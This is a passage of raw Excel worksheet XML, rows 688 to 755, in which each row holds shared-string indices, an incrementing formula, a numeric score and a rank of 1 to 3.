      <c r="C688">
        <f t="shared" si="10"/>
        <v>10290999</v>
      </c>
      <c r="D688" t="s">
        <v>1327</v>
      </c>
      <c r="E688">
        <v>23.2451286315918</v>
      </c>
      <c r="F688">
        <v>1</v>
      </c>
    </row>
    <row r="689" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A689" t="s">
        <v>1325</v>
      </c>
      <c r="B689" t="s">
        <v>1326</v>
      </c>
      <c r="C689">
        <f t="shared" si="10"/>
        <v>10292252</v>
      </c>
      <c r="D689" t="s">
        <v>1328</v>
      </c>
      <c r="E689">
        <v>6.5298199653625488</v>
      </c>
      <c r="F689">
        <v>2</v>
      </c>
    </row>
    <row r="690" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A690" t="s">
        <v>1329</v>
      </c>
      <c r="B690" t="s">
        <v>1330</v>
      </c>
      <c r="C690">
        <f t="shared" si="10"/>
        <v>10293505</v>
      </c>
      <c r="D690" t="s">
        <v>1331</v>
      </c>
      <c r="E690">
        <v>28.366617202758789</v>
      </c>
      <c r="F690">
        <v>1</v>
      </c>
    </row>
    <row r="691" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A691" t="s">
        <v>1329</v>
      </c>
      <c r="B691" t="s">
        <v>1330</v>
      </c>
      <c r="C691">
        <f t="shared" si="10"/>
        <v>10294758</v>
      </c>
      <c r="D691" t="s">
        <v>1332</v>
      </c>
      <c r="E691">
        <v>15.08585739135742</v>
      </c>
      <c r="F691">
        <v>2</v>
      </c>
    </row>
    <row r="692" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A692" t="s">
        <v>1333</v>
      </c>
      <c r="B692" t="s">
        <v>1334</v>
      </c>
      <c r="C692">
        <f t="shared" si="10"/>
        <v>10296011</v>
      </c>
      <c r="D692" t="s">
        <v>1335</v>
      </c>
      <c r="E692">
        <v>30.534976959228519</v>
      </c>
      <c r="F692">
        <v>1</v>
      </c>
    </row>
    <row r="693" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A693" t="s">
        <v>1333</v>
      </c>
      <c r="B693" t="s">
        <v>1334</v>
      </c>
      <c r="C693">
        <f t="shared" si="10"/>
        <v>10297264</v>
      </c>
      <c r="D693" t="s">
        <v>1336</v>
      </c>
      <c r="E693">
        <v>1.520131468772888</v>
      </c>
      <c r="F693">
        <v>2</v>
      </c>
    </row>
    <row r="694" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A694" t="s">
        <v>1337</v>
      </c>
      <c r="B694" t="s">
        <v>1338</v>
      </c>
      <c r="C694">
        <f t="shared" si="10"/>
        <v>10298517</v>
      </c>
      <c r="D694" t="s">
        <v>1339</v>
      </c>
      <c r="E694">
        <v>28.191848754882809</v>
      </c>
      <c r="F694">
        <v>1</v>
      </c>
    </row>
    <row r="695" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A695" t="s">
        <v>1337</v>
      </c>
      <c r="B695" t="s">
        <v>1338</v>
      </c>
      <c r="C695">
        <f t="shared" si="10"/>
        <v>10299770</v>
      </c>
      <c r="D695" t="s">
        <v>1340</v>
      </c>
      <c r="E695">
        <v>2.267728328704834</v>
      </c>
      <c r="F695">
        <v>2</v>
      </c>
    </row>
    <row r="696" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A696" t="s">
        <v>1341</v>
      </c>
      <c r="B696" t="s">
        <v>1342</v>
      </c>
      <c r="C696">
        <f t="shared" si="10"/>
        <v>10301023</v>
      </c>
      <c r="D696" t="s">
        <v>1343</v>
      </c>
      <c r="E696">
        <v>37.380977630615227</v>
      </c>
      <c r="F696">
        <v>1</v>
      </c>
    </row>
    <row r="697" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A697" t="s">
        <v>1341</v>
      </c>
      <c r="B697" t="s">
        <v>1342</v>
      </c>
      <c r="C697">
        <f t="shared" si="10"/>
        <v>10302276</v>
      </c>
      <c r="D697" t="s">
        <v>1344</v>
      </c>
      <c r="E697">
        <v>5.3467268943786621</v>
      </c>
      <c r="F697">
        <v>2</v>
      </c>
    </row>
    <row r="698" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A698" t="s">
        <v>1345</v>
      </c>
      <c r="B698" t="s">
        <v>1346</v>
      </c>
      <c r="C698">
        <f t="shared" si="10"/>
        <v>10303529</v>
      </c>
      <c r="D698" t="s">
        <v>1347</v>
      </c>
      <c r="E698">
        <v>32.702854156494141</v>
      </c>
      <c r="F698">
        <v>1</v>
      </c>
    </row>
    <row r="699" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A699" t="s">
        <v>1345</v>
      </c>
      <c r="B699" t="s">
        <v>1346</v>
      </c>
      <c r="C699">
        <f t="shared" si="10"/>
        <v>10304782</v>
      </c>
      <c r="D699" t="s">
        <v>1348</v>
      </c>
      <c r="E699">
        <v>11.82307052612305</v>
      </c>
      <c r="F699">
        <v>2</v>
      </c>
    </row>
    <row r="700" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A700" t="s">
        <v>1349</v>
      </c>
      <c r="B700" t="s">
        <v>1350</v>
      </c>
      <c r="C700">
        <f t="shared" si="10"/>
        <v>10306035</v>
      </c>
      <c r="D700" t="s">
        <v>1351</v>
      </c>
      <c r="E700">
        <v>33.805397033691413</v>
      </c>
      <c r="F700">
        <v>1</v>
      </c>
    </row>
    <row r="701" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A701" t="s">
        <v>1349</v>
      </c>
      <c r="B701" t="s">
        <v>1350</v>
      </c>
      <c r="C701">
        <f t="shared" si="10"/>
        <v>10307288</v>
      </c>
      <c r="D701" t="s">
        <v>1352</v>
      </c>
      <c r="E701">
        <v>0.71545928716659546</v>
      </c>
      <c r="F701">
        <v>2</v>
      </c>
    </row>
    <row r="702" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A702" t="s">
        <v>1353</v>
      </c>
      <c r="B702" t="s">
        <v>1354</v>
      </c>
      <c r="C702">
        <f t="shared" si="10"/>
        <v>10308541</v>
      </c>
      <c r="D702" t="s">
        <v>1355</v>
      </c>
      <c r="E702">
        <v>24.454042434692379</v>
      </c>
      <c r="F702">
        <v>1</v>
      </c>
    </row>
    <row r="703" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A703" t="s">
        <v>1353</v>
      </c>
      <c r="B703" t="s">
        <v>1354</v>
      </c>
      <c r="C703">
        <f t="shared" si="10"/>
        <v>10309794</v>
      </c>
      <c r="D703" t="s">
        <v>1356</v>
      </c>
      <c r="E703">
        <v>17.230930328369141</v>
      </c>
      <c r="F703">
        <v>2</v>
      </c>
    </row>
    <row r="704" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A704" t="s">
        <v>1357</v>
      </c>
      <c r="B704" t="s">
        <v>1358</v>
      </c>
      <c r="C704">
        <f t="shared" si="10"/>
        <v>10311047</v>
      </c>
      <c r="D704" t="s">
        <v>908</v>
      </c>
      <c r="E704">
        <v>25.864114761352539</v>
      </c>
      <c r="F704">
        <v>1</v>
      </c>
    </row>
    <row r="705" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A705" t="s">
        <v>1357</v>
      </c>
      <c r="B705" t="s">
        <v>1358</v>
      </c>
      <c r="C705">
        <f t="shared" si="10"/>
        <v>10312300</v>
      </c>
      <c r="D705" t="s">
        <v>1359</v>
      </c>
      <c r="E705">
        <v>0.98295938968658447</v>
      </c>
      <c r="F705">
        <v>2</v>
      </c>
    </row>
    <row r="706" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A706" t="s">
        <v>1360</v>
      </c>
      <c r="B706" t="s">
        <v>1361</v>
      </c>
      <c r="C706">
        <f t="shared" si="10"/>
        <v>10313553</v>
      </c>
      <c r="D706" t="s">
        <v>1362</v>
      </c>
      <c r="E706">
        <v>30.802585601806641</v>
      </c>
      <c r="F706">
        <v>1</v>
      </c>
    </row>
    <row r="707" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A707" t="s">
        <v>1360</v>
      </c>
      <c r="B707" t="s">
        <v>1361</v>
      </c>
      <c r="C707">
        <f t="shared" si="10"/>
        <v>10314806</v>
      </c>
      <c r="D707" t="s">
        <v>1363</v>
      </c>
      <c r="E707">
        <v>15.33994102478027</v>
      </c>
      <c r="F707">
        <v>2</v>
      </c>
    </row>
    <row r="708" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A708" t="s">
        <v>1364</v>
      </c>
      <c r="B708" t="s">
        <v>1365</v>
      </c>
      <c r="C708">
        <f t="shared" si="10"/>
        <v>10316059</v>
      </c>
      <c r="D708" t="s">
        <v>1366</v>
      </c>
      <c r="E708">
        <v>30.092607498168949</v>
      </c>
      <c r="F708">
        <v>1</v>
      </c>
    </row>
    <row r="709" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A709" t="s">
        <v>1364</v>
      </c>
      <c r="B709" t="s">
        <v>1365</v>
      </c>
      <c r="C709">
        <f t="shared" si="10"/>
        <v>10317312</v>
      </c>
      <c r="D709" t="s">
        <v>1367</v>
      </c>
      <c r="E709">
        <v>1.9731787443161011</v>
      </c>
      <c r="F709">
        <v>2</v>
      </c>
    </row>
    <row r="710" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A710" t="s">
        <v>1368</v>
      </c>
      <c r="B710" t="s">
        <v>1369</v>
      </c>
      <c r="C710">
        <f t="shared" si="10"/>
        <v>10318565</v>
      </c>
      <c r="D710" t="s">
        <v>1370</v>
      </c>
      <c r="E710">
        <v>36.487022399902337</v>
      </c>
      <c r="F710">
        <v>1</v>
      </c>
    </row>
    <row r="711" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A711" t="s">
        <v>1368</v>
      </c>
      <c r="B711" t="s">
        <v>1369</v>
      </c>
      <c r="C711">
        <f t="shared" si="10"/>
        <v>10319818</v>
      </c>
      <c r="D711" t="s">
        <v>1371</v>
      </c>
      <c r="E711">
        <v>8.8472890853881836</v>
      </c>
      <c r="F711">
        <v>2</v>
      </c>
    </row>
    <row r="712" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A712" t="s">
        <v>1372</v>
      </c>
      <c r="B712" t="s">
        <v>1373</v>
      </c>
      <c r="C712">
        <f t="shared" si="10"/>
        <v>10321071</v>
      </c>
      <c r="D712" t="s">
        <v>1374</v>
      </c>
      <c r="E712">
        <v>21.278352737426761</v>
      </c>
      <c r="F712">
        <v>1</v>
      </c>
    </row>
    <row r="713" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A713" t="s">
        <v>1372</v>
      </c>
      <c r="B713" t="s">
        <v>1373</v>
      </c>
      <c r="C713">
        <f t="shared" si="10"/>
        <v>10322324</v>
      </c>
      <c r="D713" t="s">
        <v>1375</v>
      </c>
      <c r="E713">
        <v>1.331392884254456</v>
      </c>
      <c r="F713">
        <v>2</v>
      </c>
    </row>
    <row r="714" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A714" t="s">
        <v>1376</v>
      </c>
      <c r="B714" t="s">
        <v>1377</v>
      </c>
      <c r="C714">
        <f t="shared" ref="C714:C777" si="11">C713+1253</f>
        <v>10323577</v>
      </c>
      <c r="D714" t="s">
        <v>1378</v>
      </c>
      <c r="E714">
        <v>29.2869987487793</v>
      </c>
      <c r="F714">
        <v>1</v>
      </c>
    </row>
    <row r="715" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A715" t="s">
        <v>1376</v>
      </c>
      <c r="B715" t="s">
        <v>1377</v>
      </c>
      <c r="C715">
        <f t="shared" si="11"/>
        <v>10324830</v>
      </c>
      <c r="D715" t="s">
        <v>1379</v>
      </c>
      <c r="E715">
        <v>3.9192619323730469</v>
      </c>
      <c r="F715">
        <v>2</v>
      </c>
    </row>
    <row r="716" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A716" t="s">
        <v>1380</v>
      </c>
      <c r="B716" t="s">
        <v>1381</v>
      </c>
      <c r="C716">
        <f t="shared" si="11"/>
        <v>10326083</v>
      </c>
      <c r="D716" t="s">
        <v>1382</v>
      </c>
      <c r="E716">
        <v>26.071176528930661</v>
      </c>
      <c r="F716">
        <v>1</v>
      </c>
    </row>
    <row r="717" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A717" t="s">
        <v>1380</v>
      </c>
      <c r="B717" t="s">
        <v>1381</v>
      </c>
      <c r="C717">
        <f t="shared" si="11"/>
        <v>10327336</v>
      </c>
      <c r="D717" t="s">
        <v>1383</v>
      </c>
      <c r="E717">
        <v>6.5076823234558114</v>
      </c>
      <c r="F717">
        <v>2</v>
      </c>
    </row>
    <row r="718" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A718" t="s">
        <v>1384</v>
      </c>
      <c r="B718" t="s">
        <v>1385</v>
      </c>
      <c r="C718">
        <f t="shared" si="11"/>
        <v>10328589</v>
      </c>
      <c r="D718" t="s">
        <v>1386</v>
      </c>
      <c r="E718">
        <v>25.81912994384766</v>
      </c>
      <c r="F718">
        <v>1</v>
      </c>
    </row>
    <row r="719" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A719" t="s">
        <v>1384</v>
      </c>
      <c r="B719" t="s">
        <v>1385</v>
      </c>
      <c r="C719">
        <f t="shared" si="11"/>
        <v>10329842</v>
      </c>
      <c r="D719" t="s">
        <v>1387</v>
      </c>
      <c r="E719">
        <v>10.54019927978516</v>
      </c>
      <c r="F719">
        <v>2</v>
      </c>
    </row>
    <row r="720" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A720" t="s">
        <v>1388</v>
      </c>
      <c r="B720" t="s">
        <v>1389</v>
      </c>
      <c r="C720">
        <f t="shared" si="11"/>
        <v>10331095</v>
      </c>
      <c r="D720" t="s">
        <v>1390</v>
      </c>
      <c r="E720">
        <v>27.04351806640625</v>
      </c>
      <c r="F720">
        <v>1</v>
      </c>
    </row>
    <row r="721" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A721" t="s">
        <v>1388</v>
      </c>
      <c r="B721" t="s">
        <v>1389</v>
      </c>
      <c r="C721">
        <f t="shared" si="11"/>
        <v>10332348</v>
      </c>
      <c r="D721" t="s">
        <v>1391</v>
      </c>
      <c r="E721">
        <v>1.3526872498914599E-3</v>
      </c>
      <c r="F721">
        <v>2</v>
      </c>
    </row>
    <row r="722" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A722" t="s">
        <v>1392</v>
      </c>
      <c r="B722" t="s">
        <v>1393</v>
      </c>
      <c r="C722">
        <f t="shared" si="11"/>
        <v>10333601</v>
      </c>
      <c r="D722" t="s">
        <v>1394</v>
      </c>
      <c r="E722">
        <v>13.26547336578369</v>
      </c>
      <c r="F722">
        <v>1</v>
      </c>
    </row>
    <row r="723" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A723" t="s">
        <v>1392</v>
      </c>
      <c r="B723" t="s">
        <v>1393</v>
      </c>
      <c r="C723">
        <f t="shared" si="11"/>
        <v>10334854</v>
      </c>
      <c r="D723" t="s">
        <v>1395</v>
      </c>
      <c r="E723">
        <v>11.40017604827881</v>
      </c>
      <c r="F723">
        <v>2</v>
      </c>
    </row>
    <row r="724" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A724" t="s">
        <v>1396</v>
      </c>
      <c r="B724" t="s">
        <v>1397</v>
      </c>
      <c r="C724">
        <f t="shared" si="11"/>
        <v>10336107</v>
      </c>
      <c r="D724" t="s">
        <v>1398</v>
      </c>
      <c r="E724">
        <v>24.746408462524411</v>
      </c>
      <c r="F724">
        <v>1</v>
      </c>
    </row>
    <row r="725" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A725" t="s">
        <v>1396</v>
      </c>
      <c r="B725" t="s">
        <v>1397</v>
      </c>
      <c r="C725">
        <f t="shared" si="11"/>
        <v>10337360</v>
      </c>
      <c r="D725" t="s">
        <v>1399</v>
      </c>
      <c r="E725">
        <v>9.9595365524291992</v>
      </c>
      <c r="F725">
        <v>2</v>
      </c>
    </row>
    <row r="726" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A726" t="s">
        <v>1400</v>
      </c>
      <c r="B726" t="s">
        <v>1401</v>
      </c>
      <c r="C726">
        <f t="shared" si="11"/>
        <v>10338613</v>
      </c>
      <c r="D726" t="s">
        <v>1402</v>
      </c>
      <c r="E726">
        <v>23.234439849853519</v>
      </c>
      <c r="F726">
        <v>1</v>
      </c>
    </row>
    <row r="727" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A727" t="s">
        <v>1400</v>
      </c>
      <c r="B727" t="s">
        <v>1401</v>
      </c>
      <c r="C727">
        <f t="shared" si="11"/>
        <v>10339866</v>
      </c>
      <c r="D727" t="s">
        <v>1403</v>
      </c>
      <c r="E727">
        <v>6.4254164695739746</v>
      </c>
      <c r="F727">
        <v>2</v>
      </c>
    </row>
    <row r="728" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A728" t="s">
        <v>1404</v>
      </c>
      <c r="B728" t="s">
        <v>1405</v>
      </c>
      <c r="C728">
        <f t="shared" si="11"/>
        <v>10341119</v>
      </c>
      <c r="D728" t="s">
        <v>1406</v>
      </c>
      <c r="E728">
        <v>33.446048736572273</v>
      </c>
      <c r="F728">
        <v>1</v>
      </c>
    </row>
    <row r="729" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A729" t="s">
        <v>1404</v>
      </c>
      <c r="B729" t="s">
        <v>1405</v>
      </c>
      <c r="C729">
        <f t="shared" si="11"/>
        <v>10342372</v>
      </c>
      <c r="D729" t="s">
        <v>1407</v>
      </c>
      <c r="E729">
        <v>12.754951477050779</v>
      </c>
      <c r="F729">
        <v>2</v>
      </c>
    </row>
    <row r="730" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A730" t="s">
        <v>1408</v>
      </c>
      <c r="B730" t="s">
        <v>1409</v>
      </c>
      <c r="C730">
        <f t="shared" si="11"/>
        <v>10343625</v>
      </c>
      <c r="D730" t="s">
        <v>1410</v>
      </c>
      <c r="E730">
        <v>33.741188049316413</v>
      </c>
      <c r="F730">
        <v>1</v>
      </c>
    </row>
    <row r="731" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A731" t="s">
        <v>1408</v>
      </c>
      <c r="B731" t="s">
        <v>1409</v>
      </c>
      <c r="C731">
        <f t="shared" si="11"/>
        <v>10344878</v>
      </c>
      <c r="D731" t="s">
        <v>1411</v>
      </c>
      <c r="E731">
        <v>0.58624112606048584</v>
      </c>
      <c r="F731">
        <v>2</v>
      </c>
    </row>
    <row r="732" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A732" t="s">
        <v>1412</v>
      </c>
      <c r="B732" t="s">
        <v>1413</v>
      </c>
      <c r="C732">
        <f t="shared" si="11"/>
        <v>10346131</v>
      </c>
      <c r="D732" t="s">
        <v>118</v>
      </c>
      <c r="E732">
        <v>29.935050964355469</v>
      </c>
      <c r="F732">
        <v>1</v>
      </c>
    </row>
    <row r="733" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A733" t="s">
        <v>1412</v>
      </c>
      <c r="B733" t="s">
        <v>1413</v>
      </c>
      <c r="C733">
        <f t="shared" si="11"/>
        <v>10347384</v>
      </c>
      <c r="D733" t="s">
        <v>1414</v>
      </c>
      <c r="E733">
        <v>3.535341739654541</v>
      </c>
      <c r="F733">
        <v>2</v>
      </c>
    </row>
    <row r="734" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A734" t="s">
        <v>1415</v>
      </c>
      <c r="B734" t="s">
        <v>1416</v>
      </c>
      <c r="C734">
        <f t="shared" si="11"/>
        <v>10348637</v>
      </c>
      <c r="D734" t="s">
        <v>1417</v>
      </c>
      <c r="E734">
        <v>25.480960845947269</v>
      </c>
      <c r="F734">
        <v>1</v>
      </c>
    </row>
    <row r="735" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A735" t="s">
        <v>1415</v>
      </c>
      <c r="B735" t="s">
        <v>1416</v>
      </c>
      <c r="C735">
        <f t="shared" si="11"/>
        <v>10349890</v>
      </c>
      <c r="D735" t="s">
        <v>1418</v>
      </c>
      <c r="E735">
        <v>6.7952589988708496</v>
      </c>
      <c r="F735">
        <v>2</v>
      </c>
    </row>
    <row r="736" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A736" t="s">
        <v>1419</v>
      </c>
      <c r="B736" t="s">
        <v>1420</v>
      </c>
      <c r="C736">
        <f t="shared" si="11"/>
        <v>10351143</v>
      </c>
      <c r="D736" t="s">
        <v>1421</v>
      </c>
      <c r="E736">
        <v>25.6583137512207</v>
      </c>
      <c r="F736">
        <v>1</v>
      </c>
    </row>
    <row r="737" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A737" t="s">
        <v>1419</v>
      </c>
      <c r="B737" t="s">
        <v>1420</v>
      </c>
      <c r="C737">
        <f t="shared" si="11"/>
        <v>10352396</v>
      </c>
      <c r="D737" t="s">
        <v>1422</v>
      </c>
      <c r="E737">
        <v>2.750253770500422E-3</v>
      </c>
      <c r="F737">
        <v>2</v>
      </c>
    </row>
    <row r="738" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A738" t="s">
        <v>1423</v>
      </c>
      <c r="B738" t="s">
        <v>1424</v>
      </c>
      <c r="C738">
        <f t="shared" si="11"/>
        <v>10353649</v>
      </c>
      <c r="D738" t="s">
        <v>1425</v>
      </c>
      <c r="E738">
        <v>27.786928176879879</v>
      </c>
      <c r="F738">
        <v>1</v>
      </c>
    </row>
    <row r="739" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A739" t="s">
        <v>1423</v>
      </c>
      <c r="B739" t="s">
        <v>1424</v>
      </c>
      <c r="C739">
        <f t="shared" si="11"/>
        <v>10354902</v>
      </c>
      <c r="D739" t="s">
        <v>1426</v>
      </c>
      <c r="E739">
        <v>6.2907485961914063</v>
      </c>
      <c r="F739">
        <v>2</v>
      </c>
    </row>
    <row r="740" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A740" t="s">
        <v>1427</v>
      </c>
      <c r="B740" t="s">
        <v>1428</v>
      </c>
      <c r="C740">
        <f t="shared" si="11"/>
        <v>10356155</v>
      </c>
      <c r="D740" t="s">
        <v>1429</v>
      </c>
      <c r="E740">
        <v>24.29404449462891</v>
      </c>
      <c r="F740">
        <v>1</v>
      </c>
    </row>
    <row r="741" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A741" t="s">
        <v>1427</v>
      </c>
      <c r="B741" t="s">
        <v>1428</v>
      </c>
      <c r="C741">
        <f t="shared" si="11"/>
        <v>10357408</v>
      </c>
      <c r="D741" t="s">
        <v>1430</v>
      </c>
      <c r="E741">
        <v>10.40306186676025</v>
      </c>
      <c r="F741">
        <v>2</v>
      </c>
    </row>
    <row r="742" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A742" t="s">
        <v>1431</v>
      </c>
      <c r="B742" t="s">
        <v>1432</v>
      </c>
      <c r="C742">
        <f t="shared" si="11"/>
        <v>10358661</v>
      </c>
      <c r="D742" t="s">
        <v>1433</v>
      </c>
      <c r="E742">
        <v>39.530590057373047</v>
      </c>
      <c r="F742">
        <v>1</v>
      </c>
    </row>
    <row r="743" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A743" t="s">
        <v>1431</v>
      </c>
      <c r="B743" t="s">
        <v>1432</v>
      </c>
      <c r="C743">
        <f t="shared" si="11"/>
        <v>10359914</v>
      </c>
      <c r="D743" t="s">
        <v>1434</v>
      </c>
      <c r="E743">
        <v>30.313970565795898</v>
      </c>
      <c r="F743">
        <v>2</v>
      </c>
    </row>
    <row r="744" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A744" t="s">
        <v>1431</v>
      </c>
      <c r="B744" t="s">
        <v>1432</v>
      </c>
      <c r="C744">
        <f t="shared" si="11"/>
        <v>10361167</v>
      </c>
      <c r="D744" t="s">
        <v>1435</v>
      </c>
      <c r="E744">
        <v>4.3041753768920898</v>
      </c>
      <c r="F744">
        <v>3</v>
      </c>
    </row>
    <row r="745" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A745" t="s">
        <v>1436</v>
      </c>
      <c r="B745" t="s">
        <v>1437</v>
      </c>
      <c r="C745">
        <f t="shared" si="11"/>
        <v>10362420</v>
      </c>
      <c r="D745" t="s">
        <v>1438</v>
      </c>
      <c r="E745">
        <v>29.875320434570309</v>
      </c>
      <c r="F745">
        <v>1</v>
      </c>
    </row>
    <row r="746" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A746" t="s">
        <v>1436</v>
      </c>
      <c r="B746" t="s">
        <v>1437</v>
      </c>
      <c r="C746">
        <f t="shared" si="11"/>
        <v>10363673</v>
      </c>
      <c r="D746" t="s">
        <v>1439</v>
      </c>
      <c r="E746">
        <v>2.8248052597045898</v>
      </c>
      <c r="F746">
        <v>2</v>
      </c>
    </row>
    <row r="747" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A747" t="s">
        <v>1440</v>
      </c>
      <c r="B747" t="s">
        <v>1441</v>
      </c>
      <c r="C747">
        <f t="shared" si="11"/>
        <v>10364926</v>
      </c>
      <c r="D747" t="s">
        <v>1442</v>
      </c>
      <c r="E747">
        <v>30.983964920043949</v>
      </c>
      <c r="F747">
        <v>1</v>
      </c>
    </row>
    <row r="748" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A748" t="s">
        <v>1440</v>
      </c>
      <c r="B748" t="s">
        <v>1441</v>
      </c>
      <c r="C748">
        <f t="shared" si="11"/>
        <v>10366179</v>
      </c>
      <c r="D748" t="s">
        <v>1443</v>
      </c>
      <c r="E748">
        <v>9.1088739281985909E-5</v>
      </c>
      <c r="F748">
        <v>2</v>
      </c>
    </row>
    <row r="749" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A749" t="s">
        <v>1444</v>
      </c>
      <c r="B749" t="s">
        <v>1445</v>
      </c>
      <c r="C749">
        <f t="shared" si="11"/>
        <v>10367432</v>
      </c>
      <c r="D749" t="s">
        <v>1446</v>
      </c>
      <c r="E749">
        <v>25.015581130981449</v>
      </c>
      <c r="F749">
        <v>1</v>
      </c>
    </row>
    <row r="750" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A750" t="s">
        <v>1444</v>
      </c>
      <c r="B750" t="s">
        <v>1445</v>
      </c>
      <c r="C750">
        <f t="shared" si="11"/>
        <v>10368685</v>
      </c>
      <c r="D750" t="s">
        <v>1447</v>
      </c>
      <c r="E750">
        <v>1.233826279640198</v>
      </c>
      <c r="F750">
        <v>2</v>
      </c>
    </row>
    <row r="751" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A751" t="s">
        <v>1448</v>
      </c>
      <c r="B751" t="s">
        <v>1449</v>
      </c>
      <c r="C751">
        <f t="shared" si="11"/>
        <v>10369938</v>
      </c>
      <c r="D751" t="s">
        <v>1450</v>
      </c>
      <c r="E751">
        <v>26.780826568603519</v>
      </c>
      <c r="F751">
        <v>1</v>
      </c>
    </row>
    <row r="752" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A752" t="s">
        <v>1448</v>
      </c>
      <c r="B752" t="s">
        <v>1449</v>
      </c>
      <c r="C752">
        <f t="shared" si="11"/>
        <v>10371191</v>
      </c>
      <c r="D752" t="s">
        <v>1451</v>
      </c>
      <c r="E752">
        <v>0.75138956308364868</v>
      </c>
      <c r="F752">
        <v>2</v>
      </c>
    </row>
    <row r="753" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A753" t="s">
        <v>1452</v>
      </c>
      <c r="B753" t="s">
        <v>1453</v>
      </c>
      <c r="C753">
        <f t="shared" si="11"/>
        <v>10372444</v>
      </c>
      <c r="D753" t="s">
        <v>1454</v>
      </c>
      <c r="E753">
        <v>36.991546630859382</v>
      </c>
      <c r="F753">
        <v>1</v>
      </c>
    </row>
    <row r="754" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A754" t="s">
        <v>1452</v>
      </c>
      <c r="B754" t="s">
        <v>1453</v>
      </c>
      <c r="C754">
        <f t="shared" si="11"/>
        <v>10373697</v>
      </c>
      <c r="D754" t="s">
        <v>1455</v>
      </c>
      <c r="E754">
        <v>2.8903534412384029</v>
      </c>
      <c r="F754">
        <v>2</v>
      </c>
    </row>
    <row r="755" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A755" t="s">
        <v>1456</v>
      </c>
      <c r="B755" t="s">
        <v>1457</v>
      </c>
      <c r="C755">
